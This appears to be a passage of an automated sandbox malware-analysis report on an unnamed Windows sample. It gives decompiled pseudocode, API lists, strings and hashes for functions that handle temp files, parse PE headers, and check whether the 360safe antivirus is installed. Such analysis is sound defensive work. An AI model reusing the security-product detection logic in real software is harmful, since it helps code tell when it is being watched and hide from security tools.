					return E00D0071A(_t35, _t54, _t80[0x400] ^ _t80, _t71, _t74, _t77);
				}
				L1:
				E00C9820F(_t80 - 0x14);
				_t35 = 0;
				goto L2;
			}



















                                                                                                                                                                                          0x00cef3a8
                                                                                                                                                                                          0x00cef3af
                                                                                                                                                                                          0x00cef3b3
                                                                                                                                                                                          0x00cef3ba
                                                                                                                                                                                          0x00cef3c0
                                                                                                                                                                                          0x00cef3c7
                                                                                                                                                                                          0x00cef3d2
                                                                                                                                                                                          0x00cef3d5
                                                                                                                                                                                          0x00cef3da
                                                                                                                                                                                          0x00cef3dc
                                                                                                                                                                                          0x00cef3df
                                                                                                                                                                                          0x00cef3e7
                                                                                                                                                                                          0x00cef3ef
                                                                                                                                                                                          0x00cef420
                                                                                                                                                                                          0x00cef42a
                                                                                                                                                                                          0x00cef42f
                                                                                                                                                                                          0x00cef434
                                                                                                                                                                                          0x00cef436
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cef438
                                                                                                                                                                                          0x00cef43d
                                                                                                                                                                                          0x00cef44b
                                                                                                                                                                                          0x00cef44f
                                                                                                                                                                                          0x00cef460
                                                                                                                                                                                          0x00cef46d
                                                                                                                                                                                          0x00cef47a
                                                                                                                                                                                          0x00cef484
                                                                                                                                                                                          0x00cef48e
                                                                                                                                                                                          0x00cef498
                                                                                                                                                                                          0x00cef49f
                                                                                                                                                                                          0x00cef4a1
                                                                                                                                                                                          0x00cef4c3
                                                                                                                                                                                          0x00cef4c9
                                                                                                                                                                                          0x00cef4cd
                                                                                                                                                                                          0x00cef4a3
                                                                                                                                                                                          0x00cef4a3
                                                                                                                                                                                          0x00cef4a3
                                                                                                                                                                                          0x00cef4a3
                                                                                                                                                                                          0x00cef4a8
                                                                                                                                                                                          0x00cef4b0
                                                                                                                                                                                          0x00cef4b5
                                                                                                                                                                                          0x00cef3fb
                                                                                                                                                                                          0x00cef3fe
                                                                                                                                                                                          0x00cef406
                                                                                                                                                                                          0x00cef407
                                                                                                                                                                                          0x00cef408
                                                                                                                                                                                          0x00cef41d
                                                                                                                                                                                          0x00cef41d
                                                                                                                                                                                          0x00cef3f1
                                                                                                                                                                                          0x00cef3f4
                                                                                                                                                                                          0x00cef3f9
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __EH_prolog3.LIBCMT ref: 00CEF3C7
                                                                                                                                                                                            • Part of subcall function 00CE94B9: _memset.LIBCMT ref: 00CE94E6
                                                                                                                                                                                            • Part of subcall function 00CE94B9: _memset.LIBCMT ref: 00CE94F4
                                                                                                                                                                                            • Part of subcall function 00CE94B9: GetTempPathW.KERNEL32(00000400,?,?,00000000,000000CE,DLL,00000014,00C9BE84), ref: 00CE9508
                                                                                                                                                                                            • Part of subcall function 00CE94B9: _memset.LIBCMT ref: 00CE951B
                                                                                                                                                                                            • Part of subcall function 00CE94B9: PathCombineW.SHLWAPI(?,?,?), ref: 00CE954B
                                                                                                                                                                                            • Part of subcall function 00CE94B9: _wcscat.LIBCMT ref: 00CE955D
                                                                                                                                                                                            • Part of subcall function 00CE94B9: PathFileExistsW.SHLWAPI(?), ref: 00CE956B
                                                                                                                                                                                          • DeleteFileW.KERNEL32(?,0000000C), ref: 00CEF42A
                                                                                                                                                                                          • _memset.LIBCMT ref: 00CEF44F
                                                                                                                                                                                          • GetTempPathW.KERNEL32(00000400,00000000,?,?,?), ref: 00CEF460
                                                                                                                                                                                          • SHCreateDirectory.SHELL32(00000000,?,?,{A44B7723-4283-41b8-B9C0-6B1983C61382}.tmp,?,?,?), ref: 00CEF48E
                                                                                                                                                                                            • Part of subcall function 00C9820F: InterlockedDecrement.KERNEL32 ref: 00C98223
                                                                                                                                                                                          • DeleteFileW.KERNEL32(?,?,?,?), ref: 00CEF4C9
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • {A44B7723-4283-41b8-B9C0-6B1983C61382}.tmp, xrefs: 00CEF472
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Path_memset$File$DeleteTemp$CombineCreateDecrementDirectoryExistsH_prolog3Interlocked_wcscat
                                                                                                                                                                                          • String ID: {A44B7723-4283-41b8-B9C0-6B1983C61382}.tmp
                                                                                                                                                                                          • API String ID: 748049662-342223665
                                                                                                                                                                                          • Opcode ID: 735334a5d7d88ecbf42f8ba27fa02f2b3792acccee6c83a0887ee71985f66b4a
                                                                                                                                                                                          • Instruction ID: 79f07f00b427e5691065524b384760e49ab9e84d1ba473ec4799b8a63a828c9e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 735334a5d7d88ecbf42f8ba27fa02f2b3792acccee6c83a0887ee71985f66b4a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 50316072A002599BDB14EFA5DC46BFEB7B4FB44300F104429E915E72C1EB349A09DBB1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00CC6B21 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 60COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 89%
                                                                                                                                                                                          			E00CC6B21(void* __ebx, void* __edx, void* __edi, void* __eflags) {
				void* __esi;
				void* __ebp;
				signed int _t19;
				int _t27;
				void* _t36;
				void* _t41;
				int _t45;
				void* _t46;
				signed int _t47;
				void* _t49;

				_t42 = __edi;
				_t41 = __edx;
				_t36 = __ebx;
				_t47 = _t49 - 0x90;
				_t19 =  *0xd64070; // 0x8a9e1774
				 *(_t47 + 0x8c) = _t19 ^ _t47;
				_t45 = 1;
				 *(_t47 - 0x80) = 1;
				 *(_t47 - 0x78) = 0x80;
				E00D006A0(__edi, _t47 - 0x74, 0, 0x100);
				SHGetValueW(0x80000002, L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\360safe.exe", L"Path", _t47 - 0x80, _t47 - 0x74, _t47 - 0x78); // executed
				if( *(_t47 - 0x80) != 1 ||  *(_t47 - 0x74) == 0 ||  *(_t47 - 0x78) <= 0) {
					_t27 = 0;
				} else {
					E00C9B6E5(_t47 - 0x7c, _t41, _t47, _t47 - 0x74);
					PathCombineW(_t47 - 0x74,  *(_t47 - 0x7c), L"360safe.exe");
					if(PathFileExistsW(_t47 - 0x74) == 0) {
						_t45 = 0;
					}
					E00C9820F(_t47 - 0x7c);
					_t27 = _t45;
				}
				_pop(_t46);
				return E00D0071A(_t27, _t36,  *(_t47 + 0x8c) ^ _t47, _t41, _t42, _t46);
			}













                                                                                                                                                                                          0x00cc6b21
                                                                                                                                                                                          0x00cc6b21
                                                                                                                                                                                          0x00cc6b21
                                                                                                                                                                                          0x00cc6b22
                                                                                                                                                                                          0x00cc6b2f
                                                                                                                                                                                          0x00cc6b36
                                                                                                                                                                                          0x00cc6b49
                                                                                                                                                                                          0x00cc6b4b
                                                                                                                                                                                          0x00cc6b4e
                                                                                                                                                                                          0x00cc6b55
                                                                                                                                                                                          0x00cc6b78
                                                                                                                                                                                          0x00cc6b81
                                                                                                                                                                                          0x00cc6bca
                                                                                                                                                                                          0x00cc6b90
                                                                                                                                                                                          0x00cc6b97
                                                                                                                                                                                          0x00cc6ba8
                                                                                                                                                                                          0x00cc6bba
                                                                                                                                                                                          0x00cc6bbc
                                                                                                                                                                                          0x00cc6bbc
                                                                                                                                                                                          0x00cc6bc1
                                                                                                                                                                                          0x00cc6bc6
                                                                                                                                                                                          0x00cc6bc6
                                                                                                                                                                                          0x00cc6bd4
                                                                                                                                                                                          0x00cc6be1

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _memset.LIBCMT ref: 00CC6B55
                                                                                                                                                                                          • SHGetValueW.SHLWAPI(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe,Path,?,?,?,?,?,?), ref: 00CC6B78
                                                                                                                                                                                          • PathCombineW.SHLWAPI(?,?,360safe.exe,?,?,?,?), ref: 00CC6BA8
                                                                                                                                                                                          • PathFileExistsW.SHLWAPI(?,?,?,?), ref: 00CC6BB2
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • Path, xrefs: 00CC6B69
                                                                                                                                                                                          • SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe, xrefs: 00CC6B6E
                                                                                                                                                                                          • 360safe.exe, xrefs: 00CC6B9C
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Path$CombineExistsFileValue_memset
                                                                                                                                                                                          • String ID: 360safe.exe$Path$SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe
                                                                                                                                                                                          • API String ID: 1538502309-1025180333
                                                                                                                                                                                          • Opcode ID: e4b50737335dd593b526602a4cd903ece82e77e0ff909cc09c883c70038f7adf
                                                                                                                                                                                          • Instruction ID: 01c0a9095f2bed8f2ce5d7ede22ffc8922d2c8fb079ca6c54a3fd75a3432a52e
                                                                                                                                                                                          • Opcode Fuzzy Hash: e4b50737335dd593b526602a4cd903ece82e77e0ff909cc09c883c70038f7adf
                                                                                                                                                                                          • Instruction Fuzzy Hash: 28111D71D4061CABDB20DBB5DD49FDEB7B8AB04708F20412AE515E3182DBB15A489FA1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C84680 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 388COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 72%
                                                                                                                                                                                          			E00C84680(intOrPtr* __eax, signed int __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t126;
				signed int _t128;
				intOrPtr _t129;
				signed int _t130;
				signed int _t136;
				signed int _t137;
				signed int _t138;
				signed int _t139;
				signed int _t141;
				signed short _t142;
				signed int _t143;
				signed int _t147;
				signed int _t150;
				signed int _t151;
				signed int _t155;
				signed int _t156;
				signed int _t160;
				signed int _t163;
				void* _t165;
				signed int _t166;
				signed int _t168;
				signed int _t170;
				signed int _t171;
				intOrPtr* _t174;
				signed int _t181;
				signed int _t182;
				signed int _t189;
				signed short _t190;
				signed int _t193;
				void* _t202;
				intOrPtr _t205;
				signed short _t214;
				intOrPtr* _t215;
				void* _t216;
				void* _t217;
				void* _t218;
				void* _t219;

				_t215 =  *((intOrPtr*)(_t216 + 0x64));
				_t203 = 0;
				_t174 = __eax;
				_t209 = __ecx;
				 *((intOrPtr*)(_t216 + 0x28)) = 0;
				 *((intOrPtr*)(_t216 + 0x24)) = 0;
				_t126 = E00D006A0(0, _t216 + 0x3c, 0, 0x30);
				_t217 = _t216 + 0xc;
				 *(_t217 + 0x40) = _t209;
				__imp__GetFileSizeEx(_t209, _t217 + 0x58);
				if(_t126 != 0) {
					 *((intOrPtr*)(_t217 + 0x68)) = 0x4000;
					_t209 = E00D017AD(_t174, _t199, 0, 0x4000);
					_t218 = _t217 + 4;
					__eflags = _t209;
					if(_t209 == 0) {
						SetLastError(8);
					}
					 *(_t218 + 0x60) = _t209;
					__eflags = _t209 - _t203;
					if(__eflags != 0) {
						_t203 = _t218 + 0x48;
						_t128 = E00C84410(_t218 + 0x48, _t218 + 0x48, _t218 + 0x48, _t174, 0x40);
						_t219 = _t218 + 0x10;
						__eflags = _t128;
						if(__eflags == 0) {
							goto L71;
						}
						_t199 = 0x5a4d;
						__eflags =  *_t174 - 0x5a4d;
						if( *_t174 != 0x5a4d) {
							L70:
							E00C88420(1, 0xd47270);
							_t219 = _t219 + 4;
							goto L71;
						}
						_t136 =  *(_t174 + 0x3c);
						__eflags = _t136;
						if(_t136 <= 0) {
							goto L70;
						}
						asm("cdq");
						_t137 = E00C84410(_t203, _t136, 0x5a4d, _t219 + 0x30, 4);
						_t219 = _t219 + 0x10;
						__eflags = _t137;
						if(__eflags == 0) {
							goto L71;
						}
						__eflags =  *((intOrPtr*)(_t219 + 0x2c)) - 0x4550;
						if( *((intOrPtr*)(_t219 + 0x2c)) != 0x4550) {
							goto L70;
						}
						_t138 =  *(_t174 + 0x3c);
						_t209 = _t138 + 4;
						 *(_t219 + 0x34) = 0;
						 *((intOrPtr*)(_t215 + 0xa0)) = 0;
						__eflags = _t138 - 0x110;
						if(_t138 < 0x110) {
							L15:
							_t199 =  *(_t219 + 0x34);
							_t203 = _t219 + 0x48;
							_t139 = E00C84410(_t219 + 0x48, _t209,  *(_t219 + 0x34), _t174, 0x14);
							_t219 = _t219 + 0x10;
							__eflags = _t139;
							if(__eflags == 0) {
								goto L71;
							}
							_t209 = _t209 + 0x14;
							asm("adc eax, 0x0");
							 *(_t219 + 0x44) =  *(_t219 + 0x34);
							_t141 = E00C84410(_t203, _t209,  *(_t219 + 0x34), _t219 + 0x2c, 2);
							_t219 = _t219 + 0x10;
							__eflags = _t141;
							if(__eflags == 0) {
								goto L71;
							}
							_t142 =  *(_t219 + 0x28);
							_t199 = 0x10b;
							__eflags = _t142 - 0x10b;
							if(_t142 != 0x10b) {
								__eflags = _t142 - 0x20b;
								if(_t142 != 0x20b) {
									goto L70;
								}
								_t181 =  *(_t174 + 0x10) & 0x0000ffff;
								_t199 = 0x88;
								__eflags = _t181 - 0x88;
								if(_t181 < 0x88) {
									goto L70;
								}
								_t199 = 0;
								__eflags = 0;
								 *(_t219 + 0x14) = 0xf0;
								_t143 =  *(_t219 + 0x14);
								 *(_t219 + 0x20) = 0;
								L23:
								_t182 = _t181 & 0x0000ffff;
								__eflags = _t182 - _t143;
								if(_t182 < _t143) {
									 *(_t219 + 0x14) = _t182;
									_t143 = _t182;
								}
								 *(_t219 + 0x10) =  *(_t174 + 2) & 0x0000ffff;
								__eflags = _t143 - _t199;
								if(_t143 == _t199) {
									L28:
									 *_t215 = _t209 + 0x40;
									__eflags =  *(_t219 + 0x20) - _t199;
									if( *(_t219 + 0x20) == _t199) {
										 *((intOrPtr*)(_t215 + 4)) = _t209 + 0x90;
										 *(_t215 + 0xc) =  *(_t174 + 0x90);
										 *((intOrPtr*)(_t215 + 0x14)) =  *((intOrPtr*)(_t174 + 0x94));
										 *((intOrPtr*)(_t215 + 0x10)) =  *((intOrPtr*)(_t174 + 0x40));
										_t189 = 1;
										 *((char*)(_t215 + 0x9c)) = 1;
										__eflags =  *((intOrPtr*)(_t174 + 0x44)) - 1;
										if( *((intOrPtr*)(_t174 + 0x44)) != 1) {
											 *((char*)(_t215 + 0x9d)) = 0;
										} else {
											 *((char*)(_t215 + 0x9d)) = 1;
										}
										 *(_t219 + 0x20) =  *(_t174 + 0x80);
										_t205 =  *((intOrPtr*)(_t174 + 0x84));
									} else {
										 *((intOrPtr*)(_t215 + 4)) = _t209 + 0x80;
										 *(_t215 + 0xc) =  *(_t174 + 0x80);
										 *((intOrPtr*)(_t215 + 0x14)) =  *((intOrPtr*)(_t174 + 0x84));
										 *((intOrPtr*)(_t215 + 0x10)) =  *((intOrPtr*)(_t174 + 0x40));
										_t189 = 1;
										 *((char*)(_t215 + 0x9c)) = 0;
										__eflags =  *((intOrPtr*)(_t174 + 0x44)) - 1;
										if( *((intOrPtr*)(_t174 + 0x44)) != 1) {
											 *((char*)(_t215 + 0x9d)) = 0;
											 *(_t219 + 0x20) =  *(_t174 + 0x70);
											_t205 =  *((intOrPtr*)(_t174 + 0x74));
										} else {
											 *((char*)(_t215 + 0x9d)) = 1;
											 *(_t219 + 0x20) =  *(_t174 + 0x70);
											_t205 =  *((intOrPtr*)(_t174 + 0x74));
										}
									}
									 *((intOrPtr*)(_t219 + 0x24)) = _t205;
									_t203 =  *((intOrPtr*)(_t215 + 4)) + 4;
									_t209 = _t209 + _t143;
									asm("adc [esp+0x34], edx");
									 *((intOrPtr*)(_t215 + 8)) =  *((intOrPtr*)(_t215 + 4)) + 4;
									 *(_t219 + 0x30) = _t209;
									 *(_t215 + 0x18) = _t199;
									 *((char*)(_t215 + 0x9e)) = 0;
									 *(_t215 + 0xb0) = _t209;
									__eflags =  *((intOrPtr*)(_t215 + 0xa0)) - _t199;
									if( *((intOrPtr*)(_t215 + 0xa0)) == _t199) {
										L39:
										 *(_t219 + 0x14) = _t199;
										goto L40;
									} else {
										__eflags =  *((char*)(_t215 + 0x9c));
										if( *((char*)(_t215 + 0x9c)) != 0) {
											goto L39;
										}
										__eflags =  *((char*)(_t215 + 0x9d));
										 *(_t219 + 0x14) = _t189;
										if( *((char*)(_t215 + 0x9d)) != 0) {
											L40:
											__eflags =  *(_t219 + 0x20) - _t199;
											if( *(_t219 + 0x20) != _t199) {
												L42:
												_t190 =  *(_t219 + 0x10);
												 *(_t219 + 0x28) = 0x333;
												__eflags = _t190 - 0x333;
												if(__eflags <= 0) {
													__eflags = _t190 - 0xffff;
													if(__eflags == 0) {
														 *(_t219 + 0x10) = 0xfffe;
													}
												} else {
													 *(_t219 + 0x10) = 0x333;
												}
												_t209 = ( *(_t219 + 0x10) & 0x0000ffff) + ( *(_t219 + 0x10) & 0x0000ffff) * 4 + ( *(_t219 + 0x10) & 0x0000ffff) + ( *(_t219 + 0x10) & 0x0000ffff) * 4 + ( *(_t219 + 0x10) & 0x0000ffff) + ( *(_t219 + 0x10) & 0x0000ffff) * 4 + ( *(_t219 + 0x10) & 0x0000ffff) + ( *(_t219 + 0x10) & 0x0000ffff) * 4 + ( *(_t219 + 0x10) & 0x0000ffff) + ( *(_t219 + 0x10) & 0x0000ffff) * 4 + ( *(_t219 + 0x10) & 0x0000ffff) + ( *(_t219 + 0x10) & 0x0000ffff) * 4 + ( *(_t219 + 0x10) & 0x0000ffff) + ( *(_t219 + 0x10) & 0x0000ffff) * 4 + ( *(_t219 + 0x10) & 0x0000ffff) + ( *(_t219 + 0x10) & 0x0000ffff) * 4;
												_t147 = E00C83D10(_t209, __eflags);
												 *(_t219 + 0x18) = _t147;
												__eflags = _t147;
												if(__eflags != 0) {
													__eflags = _t209;
													if(_t209 == 0) {
														L51:
														 *(_t215 + 0xb0) =  *(_t215 + 0xb0) + _t209;
														__eflags =  *(_t219 + 0x14);
														_t214 =  *(_t219 + 0x10);
														if( *(_t219 + 0x14) == 0) {
															L58:
															_t199 =  *(_t219 + 0x20);
															_t209 = E00C84C50(_t147,  *(_t219 + 0x20), _t203, _t214,  *((intOrPtr*)(_t219 + 0x24)));
															_t219 = _t219 + 4;
															 *(_t219 + 0x20) = _t209;
															__eflags = _t209;
															if(__eflags == 0) {
																L69:
																 *(_t219 + 0x1c) = 1;
																goto L71;
															}
															_push(0xa);
															_push(_t209);
															_t150 = E00C84BA0(_t219 + 0x40, _t174);
															_t219 = _t219 + 8;
															__eflags = _t150;
															if(__eflags == 0) {
																goto L69;
															}
															_t151 =  *(_t150 + 4);
															__eflags = _t151;
															if(__eflags >= 0) {
																goto L69;
															}
															_push(0x360);
															_push((_t151 & 0x7fffffff) + _t209);
															_t155 = E00C84BA0(_t219 + 0x40, _t174);
															_t219 = _t219 + 8;
															__eflags = _t155;
															if(__eflags == 0) {
																goto L69;
															}
															_t156 =  *(_t155 + 4);
															__eflags = _t156;
															if(__eflags >= 0) {
																goto L69;
															}
															_push(0);
															_push((_t156 & 0x7fffffff) + _t209);
															_t160 = E00C84BA0(_t219 + 0x40, _t174);
															_t219 = _t219 + 8;
															__eflags = _t160;
															if(__eflags == 0) {
																goto L69;
															}
															_t161 =  *(_t160 + 4);
															__eflags =  *(_t160 + 4);
															if(__eflags < 0) {
																goto L69;
															}
															_t203 = _t219 + 0x48;
															_t163 = E00C84410(_t219 + 0x48, _t161 + _t209, 0, _t174, 0x10);
															_t219 = _t219 + 0x10;
															__eflags = _t163;
															if(__eflags == 0) {
																goto L71;
															}
															__eflags =  *((intOrPtr*)(_t174 + 4)) - 0x80;
															if(__eflags != 0) {
																goto L69;
															}
															_t209 =  *(_t219 + 0x10);
															_t165 = E00C84C50( *(_t219 + 0x18),  *_t174, _t203,  *(_t219 + 0x10), 0x80);
															_t199 = _t215 + 0x1c;
															_t166 = E00C84410(_t203, _t165, 0, _t215 + 0x1c, 0x80);
															_t219 = _t219 + 0x14;
															__eflags = _t166;
															if(__eflags == 0) {
																goto L71;
															}
															 *(_t215 + 0x18) =  *(_t219 + 0x20);
															goto L69;
														}
														_t203 = 0;
														_t202 = 0;
														_t193 = _t147;
														__eflags = 0 - _t214;
														if(0 >= _t214) {
															goto L58;
														} else {
															goto L53;
														}
														do {
															L53:
															__eflags =  *_t193 - 0x54494e49;
															if( *_t193 != 0x54494e49) {
																goto L55;
															}
															__eflags =  *((char*)(_t193 + 4));
															if( *((char*)(_t193 + 4)) == 0) {
																 *((char*)(_t215 + 0x9e)) = 1;
																goto L58;
															}
															L55:
															_t202 = _t202 + 1;
															_t193 = _t193 + 0x28;
															__eflags = _t202 - _t214;
														} while (_t202 < _t214);
														goto L58;
													}
													_t199 =  *(_t219 + 0x30);
													_t203 = _t219 + 0x48;
													_t168 = E00C84410(_t219 + 0x48,  *(_t219 + 0x30),  *(_t219 + 0x34), _t147, _t209);
													_t219 = _t219 + 0x10;
													__eflags = _t168;
													if(__eflags == 0) {
														goto L71;
													}
													_t147 =  *(_t219 + 0x18);
													goto L51;
												} else {
													_push(0xd47270);
													_push(_t147);
													_push(_t147);
													_t199 = 0xd47270;
													E00C88150(0xd47270);
													_t219 = _t219 + 0xc;
													goto L71;
												}
											}
											__eflags =  *(_t219 + 0x14) - _t199;
											if(__eflags == 0) {
												goto L69;
											}
											goto L42;
										}
										goto L39;
									}
								} else {
									_t199 =  *(_t219 + 0x34);
									_t203 = _t219 + 0x48;
									_t170 = E00C84410(_t219 + 0x48, _t209,  *(_t219 + 0x34), _t174, _t143);
									_t219 = _t219 + 0x10;
									__eflags = _t170;
									if(__eflags == 0) {
										goto L71;
									}
									_t143 =  *(_t219 + 0x14);
									_t199 = 0;
									__eflags = 0;
									goto L28;
								}
							}
							_t181 =  *(_t174 + 0x10) & 0x0000ffff;
							__eflags = _t181 - 0x78;
							if(_t181 < 0x78) {
								goto L70;
							}
							_t143 = 0xe0;
							 *(_t219 + 0x20) = 1;
							 *(_t219 + 0x14) = 0xe0;
							_t199 = 0;
							goto L23;
						}
						_t171 = E00C84410(_t203, 0x80, 0, _t174, 0x90);
						_t219 = _t219 + 0x10;
						__eflags = _t171;
						if(__eflags == 0) {
							goto L71;
						}
						__eflags =  *_t174 - 0x82c8851f;
						if( *_t174 == 0x82c8851f) {
							 *((intOrPtr*)(_t215 + 0xa0)) = 0x80;
						}
						goto L15;
					}
					_push(0xd47270);
					_push(_t203);
					_push(_t203);
					_t199 = 0xd47270;
					E00C88150(0xd47270);
					_t219 = _t218 + 0xc;
					goto L71;
				} else {
					_push(0xd47270);
					_push(0);
					_push(0);
					_t199 = 0xd47270;
					E00C88150(0xd47270);
					_t219 = _t217 + 0xc;
					L71:
					_t129 =  *((intOrPtr*)(_t219 + 0x60));
					_t223 = _t129;
					if(_t129 != 0) {
						_push(_t129); // executed
						E00D0092B(_t174, _t199, _t203, _t209, _t223); // executed
						_t219 = _t219 + 4;
					}
					_t130 =  *(_t219 + 0x18);
					_t224 = _t130;
					if(_t130 != 0) {
						_push(_t130); // executed
						E00D0092B(_t174, _t199, _t203, _t209, _t224); // executed
						_t219 = _t219 + 4;
					}
					return  *(_t219 + 0x1c);
				}
			}












































                                                                                                                                                                                          0x00c84685
                                                                                                                                                                                          0x00c8468b
                                                                                                                                                                                          0x00c8468f
                                                                                                                                                                                          0x00c84697
                                                                                                                                                                                          0x00c84699
                                                                                                                                                                                          0x00c8469d
                                                                                                                                                                                          0x00c846a1
                                                                                                                                                                                          0x00c846a6
                                                                                                                                                                                          0x00c846af
                                                                                                                                                                                          0x00c846b3
                                                                                                                                                                                          0x00c846bb
                                                                                                                                                                                          0x00c846db
                                                                                                                                                                                          0x00c846e8
                                                                                                                                                                                          0x00c846ea
                                                                                                                                                                                          0x00c846ed
                                                                                                                                                                                          0x00c846ef
                                                                                                                                                                                          0x00c846f3
                                                                                                                                                                                          0x00c846f3
                                                                                                                                                                                          0x00c846f9
                                                                                                                                                                                          0x00c846fd
                                                                                                                                                                                          0x00c846ff
                                                                                                                                                                                          0x00c8471f
                                                                                                                                                                                          0x00c84723
                                                                                                                                                                                          0x00c84728
                                                                                                                                                                                          0x00c8472b
                                                                                                                                                                                          0x00c8472d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c84733
                                                                                                                                                                                          0x00c84738
                                                                                                                                                                                          0x00c8473b
                                                                                                                                                                                          0x00c84b5e
                                                                                                                                                                                          0x00c84b68
                                                                                                                                                                                          0x00c84b6d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c84b6d
                                                                                                                                                                                          0x00c84741
                                                                                                                                                                                          0x00c84744
                                                                                                                                                                                          0x00c84746
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c8474e
                                                                                                                                                                                          0x00c84756
                                                                                                                                                                                          0x00c8475b
                                                                                                                                                                                          0x00c8475e
                                                                                                                                                                                          0x00c84760
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c84766
                                                                                                                                                                                          0x00c8476e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c84774
                                                                                                                                                                                          0x00c84779
                                                                                                                                                                                          0x00c8477c
                                                                                                                                                                                          0x00c84780
                                                                                                                                                                                          0x00c84786
                                                                                                                                                                                          0x00c8478b
                                                                                                                                                                                          0x00c847bb
                                                                                                                                                                                          0x00c847bb
                                                                                                                                                                                          0x00c847c4
                                                                                                                                                                                          0x00c847c8
                                                                                                                                                                                          0x00c847cd
                                                                                                                                                                                          0x00c847d0
                                                                                                                                                                                          0x00c847d2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c847de
                                                                                                                                                                                          0x00c847e5
                                                                                                                                                                                          0x00c847eb
                                                                                                                                                                                          0x00c847ef
                                                                                                                                                                                          0x00c847f4
                                                                                                                                                                                          0x00c847f7
                                                                                                                                                                                          0x00c847f9
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c847ff
                                                                                                                                                                                          0x00c84803
                                                                                                                                                                                          0x00c84808
                                                                                                                                                                                          0x00c8480b
                                                                                                                                                                                          0x00c84835
                                                                                                                                                                                          0x00c84838
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c8483e
                                                                                                                                                                                          0x00c84842
                                                                                                                                                                                          0x00c84847
                                                                                                                                                                                          0x00c8484a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c84850
                                                                                                                                                                                          0x00c84850
